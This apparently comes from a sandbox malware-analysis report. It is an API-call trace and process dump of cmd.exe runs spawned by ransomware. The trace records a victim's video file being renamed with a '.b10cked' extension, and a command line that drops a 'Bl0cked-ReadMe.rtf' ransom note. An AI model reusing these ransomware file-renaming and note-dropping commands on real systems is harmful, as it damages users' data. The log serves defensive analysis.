(lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.277] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af254 | out: lpFindFileData=0x1af254) returned 0x280028 [0225.277] FindClose (in: hFindFile=0x280028 | out: hFindFile=0x280028) returned 1 [0225.278] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af254 | out: lpFindFileData=0x1af254) returned 0x280028 [0225.278] 
FindClose (in: hFindFile=0x280028 | out: hFindFile=0x280028) returned 1 [0225.278] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af254 | out: lpFindFileData=0x1af254) returned 0x280028 [0225.278] FindClose (in: hFindFile=0x280028 | out: hFindFile=0x280028) returned 1 [0225.278] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0225.278] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0225.278] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0225.278] GetEnvironmentStringsW () returned 0x282b08* [0225.278] FreeEnvironmentStringsW (penv=0x282b08) returned 1 [0225.278] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.279] GetConsoleOutputCP () returned 0x1b5 [0225.279] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.279] GetUserDefaultLCID () returned 0x409 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af618, cchData=128 | out: lpLCData="0") returned 2 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af618, cchData=128 | out: lpLCData="0") returned 2 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af618, cchData=128 | out: lpLCData="1") returned 2 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0225.280] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") returned 4 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0225.280] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0225.280] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0225.281] GetConsoleTitleW (in: lpConsoleTitle=0x2708f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.282] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.282] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0225.282] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0225.282] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0225.283] _wcsicmp (_String1="move", _String2=")") returned 68 [0225.283] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0225.283] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0225.283] _wcsicmp (_String1="IF", _String2="move") returned -4 [0225.283] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0225.283] _wcsicmp (_String1="REM", _String2="move") returned 5 [0225.283] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0225.286] GetConsoleTitleW (in: lpConsoleTitle=0x1af310, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0225.411] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0225.411] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0225.411] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0225.411] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0225.411] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0225.411] _wcsicmp (_String1="move", _String2="CD") returned 10 [0225.411] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0225.411] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0225.411] _wcsicmp (_String1="move", _String2="REN") returned -5 [0225.411] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0225.411] _wcsicmp (_String1="move", _String2="SET") returned -6 [0225.411] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0225.411] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0225.411] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0225.411] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0225.411] _wcsicmp (_String1="move", _String2="MD") returned 11 [0225.411] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0225.411] _wcsicmp (_String1="move", _String2="RD") returned -5 [0225.411] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0225.411] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0225.411] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0225.411] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0225.411] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0225.412] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0225.412] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0225.412] _wcsicmp (_String1="move", _String2="VER") returned -9 [0225.412] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0225.412] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0225.412] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0225.412] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0225.412] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0225.412] _wcsicmp (_String1="move", _String2="START") returned -6 [0225.412] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0225.412] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0225.412] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0225.413] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.414] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0225.414] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af0cc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af0c4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af0c4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.414] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0225.415] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0225.415] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0225.415] _wcsicmp (_String1="E-AGGM~1.MKV", _String2=".") returned 55 [0225.416] _wcsicmp 
(_String1="E-AGGM~1.MKV", _String2="..") returned 55 [0225.416] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggm~1.mkv")) returned 0x20 [0225.416] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x281e68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0225.416] SetErrorMode (uMode=0x0) returned 0x0 [0225.416] SetErrorMode (uMode=0x1) returned 0x0 [0225.416] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV", nBufferLength=0x104, lpBuffer=0x1aea54, lpFilePart=0x1aea3c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV", lpFilePart=0x1aea3c*="E-AGGM~1.MKV") returned 0x2a [0225.416] SetErrorMode (uMode=0x0) returned 0x1 [0225.416] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y")) returned 0x10 [0225.416] _wcsicmp (_String1="E-AGGM~1.MKV", _String2=".") returned 55 [0225.416] _wcsicmp (_String1="E-AGGM~1.MKV", _String2="..") returned 55 [0225.416] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggm~1.mkv")) returned 0x20 [0225.417] SetErrorMode (uMode=0x0) returned 0x0 [0225.417] SetErrorMode (uMode=0x1) returned 0x0 [0225.417] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV", nBufferLength=0x104, lpBuffer=0x1aeed0, lpFilePart=0x1aec68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV", lpFilePart=0x1aec68*="E-AGGM~1.MKV") returned 0x2a [0225.417] SetErrorMode (uMode=0x0) returned 0x1 [0225.417] SetErrorMode (uMode=0x0) returned 0x0 [0225.417] SetErrorMode (uMode=0x1) returned 0x0 [0225.417] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked", nBufferLength=0x104, lpBuffer=0x1af0d8, lpFilePart=0x1aec68 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA 
P_oioCEdo08.mkv.b10cked", lpFilePart=0x1aec68*="e-AggmA P_oioCEdo08.mkv.b10cked") returned 0x3d [0225.417] SetErrorMode (uMode=0x0) returned 0x1 [0225.417] SetLastError (dwErrCode=0x0) [0225.417] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggma p_oiocedo08.mkv.b10cked")) returned 0xffffffff [0225.417] GetLastError () returned 0x2 [0225.417] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV", fInfoLevelId=0x1, lpFindFileData=0x1ae5e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae5e4) returned 0x270eb0 [0225.417] FindNextFileW (in: hFindFile=0x270eb0, lpFindFileData=0x1ae5e4 | out: lpFindFileData=0x1ae5e4) returned 0 [0225.418] GetLastError () returned 0x12 [0225.418] FindClose (in: hFindFile=0x270eb0 | out: hFindFile=0x270eb0) returned 1 [0225.419] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\E-AGGM~1.MKV", fInfoLevelId=0x1, lpFindFileData=0x281c08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x281c08) returned 0x270eb0 [0225.419] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked", nBufferLength=0x104, lpBuffer=0x1ae87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked", lpFilePart=0x0) returned 0x3d [0225.419] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv", nBufferLength=0x104, lpBuffer=0x1ae87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv", lpFilePart=0x0) returned 0x35 [0225.419] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggma p_oiocedo08.mkv")) returned 0x20 [0225.419] MoveFileExW 
(lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggma p_oiocedo08.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\e-AggmA P_oioCEdo08.mkv.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\e-aggma p_oiocedo08.mkv.b10cked"), dwFlags=0x3) returned 1 [0225.420] FindClose (in: hFindFile=0x270eb0 | out: hFindFile=0x270eb0) returned 1 [0225.420] _vsnwprintf (in: _Buffer=0x49e25040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1ae830 | out: _Buffer=" 1") returned 9 [0225.420] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.420] GetFileType (hFile=0x7) returned 0x2 [0225.420] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0225.420] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1ae7bc | out: lpMode=0x1ae7bc) returned 1 [0225.420] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.420] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1ae7f0 | out: lpConsoleScreenBufferInfo=0x1ae7f0) returned 1 [0225.421] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0225.421] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x1ae830 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0225.421] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e34640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1ae814, lpReserved=0x0 | out: lpBuffer=0x49e34640*, lpNumberOfCharsWritten=0x1ae814*=0x1a) returned 1 [0225.422] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.422] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0225.422] _get_osfhandle (_FileHandle=1) returned 0x7 [0225.422] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0225.422] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0225.422] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0225.423] SetConsoleInputExeNameW () returned 0x1 [0225.423] GetConsoleOutputCP () returned 0x1b5 [0225.423] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0225.423] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.423] exit (_Code=0) Process: id = "594" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xa14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33639 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33640 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33641 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33642 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 33643 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 
region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33644 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33645 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33646 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33647 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 33648 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33789 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33790 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33791 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33792 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 33793 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 33794 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name 
= "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33795 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33796 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33797 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33798 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33799 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33800 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33801 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33802 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33803 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000230000" filename = "" Region: id = 33804 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33805 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33806 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33807 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 33808 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 33809 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33810 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 33811 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 33812 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Thread: id = 818 os_tid = 0x7f8 [0225.208] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22ff3c | out: lpSystemTimeAsFileTime=0x22ff3c*(dwLowDateTime=0xb9cbb1e0, dwHighDateTime=0x1d440a9)) [0225.208] GetCurrentProcessId () returned 0xa14 [0225.208] GetCurrentThreadId () returned 0x7f8 [0225.208] GetTickCount () returned 0x3e2df [0225.208] QueryPerformanceCounter (in: lpPerformanceCount=0x22ff34 | out: 
lpPerformanceCount=0x22ff34*=28199746450) returned 1 [0225.209] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0225.209] __set_app_type (_Type=0x1) [0225.209] __p__fmode () returned 0x76b331f4 [0225.209] __p__commode () returned 0x76b331fc [0225.209] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0225.209] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0225.209] GetCurrentThreadId () returned 0x7f8 [0225.209] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7f8) returned 0x38 [0225.209] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0225.209] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0225.209] SetThreadUILanguage (LangId=0x0) returned 0x409 [0225.209] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0225.210] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fecc | out: phkResult=0x22fecc*=0x0) returned 0x2 [0225.210] VirtualQuery (in: lpAddress=0x22ff03, lpBuffer=0x22fe9c, dwLength=0x1c | out: lpBuffer=0x22fe9c*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0225.210] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fe9c, dwLength=0x1c | out: lpBuffer=0x22fe9c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0225.210] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fe9c, dwLength=0x1c | out: lpBuffer=0x22fe9c*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, 
